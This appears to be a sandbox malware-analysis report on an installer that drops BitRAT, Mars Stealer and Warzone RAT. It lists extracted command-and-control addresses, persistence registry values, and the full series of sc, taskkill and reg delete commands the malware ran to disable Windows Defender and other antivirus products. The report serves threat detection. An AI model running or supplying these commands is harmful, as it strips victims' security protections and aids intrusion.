bitrat | bccc4ed85a1cca9413814ceaf90a4e12de07e5b0a07963ca6ea0a8b40a926550

Analysis

max time kernel
146s
max time network
157s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
03-01-2023 19:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Installerx64/Installerx32.exe
Size

2.1MB
MD5

592bef1e0325ada505ec4875d5727bc1
SHA1

d6c6aa187d2b5aaff512c12948a426584382e92c
SHA256

83b8c34a7c66b407be941e59a9ce7a84ee81a8dfad3cea67e86118e96221c749
SHA512

38410a737b63a6cf123b08b74e836e75189ce6dae8d4491b4deab5791eff29a824be24d3d70a53ccaf3137222d79253385be5180fffc1e98a0a9c11b1b1e8d3e
SSDEEP

49152:tBUOgQLgF1CiOBInpLNAZpCY3iEO+IVG5r:nU7CCtOmFNAP6O

Score

10^/10

bitrat marsstealer warzonerat default evasion infostealer persistence rat stealer trojan

Malware Config

Extracted

Family

warzonerat

45.139.105.147:5200

Extracted

Family

marsstealer

Botnet

Default

data.topababa.com/gate.php

Extracted

Family

bitrat

Version

1.38

45.139.105.147:1234

Attributes

communication_password
81dc9bdb52d04dc20036dbd8313ed055
install_dir
temp
install_file
svchost
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
Mars Stealer
An infostealer written in C++ based on other infostealers.
stealer marsstealer

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security	reg.exe

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Warzone RAT payload 6 IoCs

rat

Processes:

resource	yara_rule
\Program Files\Microsoft.exe	warzonerat
\Program Files\Microsoft.exe	warzonerat
\Program Files\Microsoft.exe	warzonerat
\Program Files\Microsoft.exe	warzonerat
C:\Program Files\Microsoft.exe	warzonerat
C:\Program Files\Microsoft.exe	warzonerat

Executes dropped EXE 5 IoCs

Processes:

Microsoft.exeBuilded.exeinstallerX32.exeInstallerX64.exeMicrosoft office.exe

pid process

576 Microsoft.exe
584 Builded.exe
608 installerX32.exe
1640 InstallerX64.exe
2016 Microsoft office.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
576	Microsoft.exe
584	Builded.exe
608	installerX32.exe
1640	InstallerX64.exe
2016	Microsoft office.exe

Loads dropped DLL 18 IoCs

Processes:

Installerx32.exe

pid	process
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe
1996	Installerx32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Microsoft office.exeMicrosoft.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost"	Microsoft office.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program Files\\Microsoft.exe"	Microsoft.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

Microsoft office.exe

pid process

2016 Microsoft office.exe
2016 Microsoft office.exe
2016 Microsoft office.exe
2016 Microsoft office.exe

pid	process
2016	Microsoft office.exe
2016	Microsoft office.exe
2016	Microsoft office.exe
2016	Microsoft office.exe

Drops file in Program Files directory 57 IoCs

Processes:

cmd.exeInstallerx32.exe

description	ioc	process
File opened for modification	C:\Program Files\Windows Defender\MpCommu.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File created	C:\Program Files\installerX32.exe	Installerx32.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpRes.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpClient.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpOAV.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpCom.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MsMpLics.dll	cmd.exe
File created	C:\Program Files\Builded.exe	Installerx32.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpSvc.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpLics.dll	cmd.exe
File opened for modification	C:\Program Files\InstallerX64.exe	Installerx32.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MSASCui.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpAsDesc.dll	cmd.exe
File opened for modification	C:\Program Files\installerX32.exe	Installerx32.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File created	C:\Program Files\Microsoft.exe	Installerx32.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpCmdRun.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpEvMsg.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File created	C:\Program Files\__tmp_rar_sfx_access_check_7080183	Installerx32.exe
File created	C:\Program Files\Microsoft office.exe	Installerx32.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpAsDesc.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpOAV.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpRTP.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Microsoft office.exe	Installerx32.exe
File opened for modification	C:\Program Files\Builded.exe	Installerx32.exe
File created	C:\Program Files\InstallerX64.exe	Installerx32.exe
File opened for modification	C:\Program Files\Microsoft.exe	Installerx32.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpClient.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe

Launches sc.exe 50 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1508	sc.exe
268	sc.exe
1712	sc.exe
1204	sc.exe
1900	sc.exe
1540	sc.exe
108	sc.exe
1840	sc.exe
1728	sc.exe
948	sc.exe
340	sc.exe
1236	sc.exe
1352	sc.exe
1948	sc.exe
1084	sc.exe
1004	sc.exe
1948	sc.exe
1148	sc.exe
940	sc.exe
972	sc.exe
848	sc.exe
564	sc.exe
1988	sc.exe
1676	sc.exe
1956	sc.exe
568	sc.exe
828	sc.exe
1656	sc.exe
1508	sc.exe
828	sc.exe
924	sc.exe
1208	sc.exe
1676	sc.exe
1776	sc.exe
1740	sc.exe
1412	sc.exe
1752	sc.exe
1636	sc.exe
772	sc.exe
1108	sc.exe
1780	sc.exe
776	sc.exe
1172	sc.exe
928	sc.exe
1628	sc.exe
1112	sc.exe
1920	sc.exe
1688	sc.exe
996	sc.exe
1708	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1676	taskkill.exe
568	taskkill.exe
1904	taskkill.exe
848	taskkill.exe
1172	taskkill.exe
1336	taskkill.exe
1744	taskkill.exe
948	taskkill.exe
1220	taskkill.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 26 IoCs

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exesc.exesc.exesc.exetaskkill.exesc.exesc.exesc.exetaskkill.exesc.exesc.exesc.exetaskkill.exe

pid	process
772	reg.exe
1820	reg.exe
1784	reg.exe
1528	reg.exe
1540	reg.exe
704	reg.exe
1992	reg.exe
1836	reg.exe
1572	reg.exe
1932	reg.exe
1032	reg.exe
1240	reg.exe
1280	reg.exe
536	reg.exe
1148	sc.exe
828	sc.exe
268	sc.exe
1904	taskkill.exe
1780	sc.exe
940	sc.exe
1840	sc.exe
848	taskkill.exe
1712	sc.exe
924	sc.exe
1208	sc.exe
1220	taskkill.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

taskkill.exeMicrosoft office.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1172	taskkill.exe
Token: SeDebugPrivilege	2016	Microsoft office.exe
Token: SeShutdownPrivilege	2016	Microsoft office.exe
Token: SeDebugPrivilege	1336	taskkill.exe
Token: SeDebugPrivilege	1744	taskkill.exe
Token: SeDebugPrivilege	948	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	568	taskkill.exe
Token: SeDebugPrivilege	1904	taskkill.exe
Token: SeDebugPrivilege	848	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Microsoft office.exe

pid process

2016 Microsoft office.exe
2016 Microsoft office.exe

pid	process
2016	Microsoft office.exe
2016	Microsoft office.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Installerx32.exeinstallerX32.execmd.exe

description	pid	process	target process
PID 1996 wrote to memory of 576	1996	Installerx32.exe	Microsoft.exe
PID 1996 wrote to memory of 576	1996	Installerx32.exe	Microsoft.exe
PID 1996 wrote to memory of 576	1996	Installerx32.exe	Microsoft.exe
PID 1996 wrote to memory of 576	1996	Installerx32.exe	Microsoft.exe
PID 1996 wrote to memory of 584	1996	Installerx32.exe	Builded.exe
PID 1996 wrote to memory of 584	1996	Installerx32.exe	Builded.exe
PID 1996 wrote to memory of 584	1996	Installerx32.exe	Builded.exe
PID 1996 wrote to memory of 584	1996	Installerx32.exe	Builded.exe
PID 1996 wrote to memory of 608	1996	Installerx32.exe	installerX32.exe
PID 1996 wrote to memory of 608	1996	Installerx32.exe	installerX32.exe
PID 1996 wrote to memory of 608	1996	Installerx32.exe	installerX32.exe
PID 1996 wrote to memory of 608	1996	Installerx32.exe	installerX32.exe
PID 1996 wrote to memory of 608	1996	Installerx32.exe	installerX32.exe
PID 1996 wrote to memory of 608	1996	Installerx32.exe	installerX32.exe
PID 1996 wrote to memory of 608	1996	Installerx32.exe	installerX32.exe
PID 1996 wrote to memory of 1640	1996	Installerx32.exe	InstallerX64.exe
PID 1996 wrote to memory of 1640	1996	Installerx32.exe	InstallerX64.exe
PID 1996 wrote to memory of 1640	1996	Installerx32.exe	InstallerX64.exe
PID 1996 wrote to memory of 1640	1996	Installerx32.exe	InstallerX64.exe
PID 1996 wrote to memory of 1640	1996	Installerx32.exe	InstallerX64.exe
PID 1996 wrote to memory of 1640	1996	Installerx32.exe	InstallerX64.exe
PID 1996 wrote to memory of 1640	1996	Installerx32.exe	InstallerX64.exe
PID 608 wrote to memory of 872	608	installerX32.exe	cmd.exe
PID 608 wrote to memory of 872	608	installerX32.exe	cmd.exe
PID 608 wrote to memory of 872	608	installerX32.exe	cmd.exe
PID 608 wrote to memory of 872	608	installerX32.exe	cmd.exe
PID 1996 wrote to memory of 2016	1996	Installerx32.exe	Microsoft office.exe
PID 1996 wrote to memory of 2016	1996	Installerx32.exe	Microsoft office.exe
PID 1996 wrote to memory of 2016	1996	Installerx32.exe	Microsoft office.exe
PID 1996 wrote to memory of 2016	1996	Installerx32.exe	Microsoft office.exe
PID 872 wrote to memory of 1656	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1656	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1656	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1352	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1352	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1352	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1508	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1508	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1508	872	cmd.exe	sc.exe
PID 872 wrote to memory of 828	872	cmd.exe	sc.exe
PID 872 wrote to memory of 828	872	cmd.exe	sc.exe
PID 872 wrote to memory of 828	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1948	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1948	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1948	872	cmd.exe	sc.exe
PID 872 wrote to memory of 776	872	cmd.exe	sc.exe
PID 872 wrote to memory of 776	872	cmd.exe	sc.exe
PID 872 wrote to memory of 776	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1172	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1172	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1172	872	cmd.exe	sc.exe
PID 872 wrote to memory of 928	872	cmd.exe	sc.exe
PID 872 wrote to memory of 928	872	cmd.exe	sc.exe
PID 872 wrote to memory of 928	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1688	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1688	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1688	872	cmd.exe	sc.exe
PID 872 wrote to memory of 972	872	cmd.exe	sc.exe
PID 872 wrote to memory of 972	872	cmd.exe	sc.exe
PID 872 wrote to memory of 972	872	cmd.exe	sc.exe
PID 872 wrote to memory of 996	872	cmd.exe	sc.exe
PID 872 wrote to memory of 996	872	cmd.exe	sc.exe
PID 872 wrote to memory of 996	872	cmd.exe	sc.exe
PID 872 wrote to memory of 1988	872	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe
"C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1996

C:\Program Files\Microsoft.exe
"C:\Program Files\Microsoft.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:576

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
3⤵
PID:1280

C:\Program Files\Builded.exe
"C:\Program Files\Builded.exe"
2⤵
- Executes dropped EXE
PID:584

C:\Program Files\installerX32.exe
"C:\Program Files\installerX32.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:608

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ADA.tmp\ADB.tmp\ADC.bat "C:\Program Files\installerX32.exe""
3⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:872

C:\Windows\system32\sc.exe
sc config windefend start= disabled
4⤵
- Launches sc.exe
PID:1352

C:\Windows\system32\sc.exe
sc stop windefend
4⤵
- Launches sc.exe
PID:1656

C:\Windows\system32\sc.exe
sc delete windefend
4⤵
- Launches sc.exe
PID:1508

C:\Windows\system32\sc.exe
sc stop WdNisSvc
4⤵
- Launches sc.exe
PID:828

C:\Windows\system32\sc.exe
sc config WdNisSvc start= disabled
4⤵
- Launches sc.exe
PID:1948

C:\Windows\system32\sc.exe
sc delete WdNisSvc
4⤵
- Launches sc.exe
PID:776

C:\Windows\system32\sc.exe
sc stop Sense
4⤵
- Launches sc.exe
PID:1172

C:\Windows\system32\sc.exe
sc config Sense start= disabled
4⤵
- Launches sc.exe
PID:928

C:\Windows\system32\sc.exe
sc delete Sense
4⤵
- Launches sc.exe
PID:1688

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:972

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
4⤵
- Launches sc.exe
PID:996

C:\Windows\system32\sc.exe
sc stop usosvc
4⤵
- Launches sc.exe
PID:1988

C:\Windows\system32\sc.exe
sc config usosvc start= disabled
4⤵
- Launches sc.exe
PID:1776

C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
4⤵
- Launches sc.exe
PID:1084

C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
4⤵
- Launches sc.exe
PID:848

C:\Windows\system32\sc.exe
sc stop SecurityHealthService
4⤵
- Launches sc.exe
PID:1752

C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
4⤵
- Launches sc.exe
PID:1204

C:\Windows\system32\sc.exe
sc delete SecurityHealthService
4⤵
- Launches sc.exe
PID:1728

C:\Windows\system32\sc.exe
sc stop SDRSVC
4⤵
- Launches sc.exe
PID:1740

C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
4⤵
- Launches sc.exe
PID:948

C:\Windows\system32\sc.exe
sc stop wscsvc
4⤵
- Launches sc.exe
PID:1636

C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
4⤵
- Launches sc.exe
PID:1676

C:\Windows\system32\sc.exe
sc stop WdiServiceHost
4⤵
- Launches sc.exe
PID:1956

C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
4⤵
- Launches sc.exe
PID:568

C:\Windows\system32\sc.exe
sc stop WdiSystemHost
4⤵
- Launches sc.exe
PID:564

C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
4⤵
- Launches sc.exe
PID:772

C:\Windows\system32\sc.exe
sc stop InstallService
4⤵
- Launches sc.exe
PID:1412

C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
4⤵
- Launches sc.exe
PID:1900

C:\Windows\system32\sc.exe
sc stop VaultSvc
4⤵
- Launches sc.exe
PID:1540

C:\Windows\system32\sc.exe
sc config VaultSvc start= disabled
4⤵
- Launches sc.exe
PID:340

C:\Windows\system32\sc.exe
sc stop Spooler
4⤵
- Launches sc.exe
PID:1708

C:\Windows\system32\sc.exe
sc config Spooler start= disabled
4⤵
- Launches sc.exe
PID:108

C:\Windows\system32\sc.exe
sc stop LicenseManager
4⤵
- Launches sc.exe
PID:1508

C:\Windows\system32\sc.exe
sc config LicenseManager start= disabled
4⤵
- Launches sc.exe
PID:1004

C:\Windows\system32\sc.exe
sc stop DiagTrack
4⤵
- Launches sc.exe
PID:1948

C:\Windows\system32\sc.exe
sc config DiagTrack start= disabled
4⤵
- Launches sc.exe
PID:1108

C:\Windows\system32\taskkill.exe
taskkill /f /im smartscreen.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Windows\system32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1744

C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Windows\System32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\system32\taskkill.exe
taskkill /f /im SystemSettings.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:772

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1820

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1784

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1528

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1540

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:704

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1992

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1836

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1572

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1932

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1032

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1240

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
4⤵
- Modifies security service
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1280

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:536

C:\Windows\SysWOW64\sc.exe
sc delete windefend
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1148

C:\Windows\SysWOW64\sc.exe
sc delete sense
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:828

C:\Windows\SysWOW64\sc.exe
sc stop nsWscSvc
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:268

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MBAMWsc.exe
4⤵
- Kills process with taskkill
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1904

C:\Windows\SysWOW64\sc.exe
sc stop MBAMService
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1780

C:\Windows\SysWOW64\sc.exe
sc config MBAMService start= disabled
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:940

C:\Windows\SysWOW64\sc.exe
sc delete MBAMService
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1840

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MBAM.exe
4⤵
- Kills process with taskkill
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:848

C:\Windows\SysWOW64\sc.exe
sc stop Bytefenceservice
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1712

C:\Windows\SysWOW64\sc.exe
sc config Bytefenceservice start= disabled
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:924

C:\Windows\SysWOW64\sc.exe
sc delete Bytefenceservice
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1208

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Bytefence.exe
4⤵
- Kills process with taskkill
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1220

C:\Windows\system32\sc.exe
sc stop "avast! Tools"
4⤵
- Launches sc.exe
PID:1628

C:\Windows\system32\sc.exe
sc config "avast! Tools" start= disabled
4⤵
- Launches sc.exe
PID:1236

C:\Windows\system32\sc.exe
sc delete "avast! Tools"
4⤵
- Launches sc.exe
PID:1112

C:\Windows\system32\sc.exe
sc stop "avast! Antivirus"
4⤵
- Launches sc.exe
PID:1676

C:\Windows\system32\sc.exe
sc config "avast! Antivirus" start= disabled
4⤵
- Launches sc.exe
PID:1920

C:\Program Files\InstallerX64.exe
"C:\Program Files\InstallerX64.exe"
2⤵
- Executes dropped EXE
PID:1640

C:\Program Files\Microsoft office.exe
"C:\Program Files\Microsoft office.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2016

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
1⤵
PID:628

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Builded.exe

Filesize
159KB

MD5
361356a7a0a38b3080b298ff8f3b8c9d

SHA1
1763fa71f4cd842a84600b47ee9b436c417f5c1f

SHA256
b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a

SHA512
0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8

Download Submit
C:\Program Files\InstallerX64.exe

Filesize
91KB

MD5
cc3db2432720f58955baa76ab4708a18

SHA1
256923ae3d9888262be5c548b553182c4400674a

SHA256
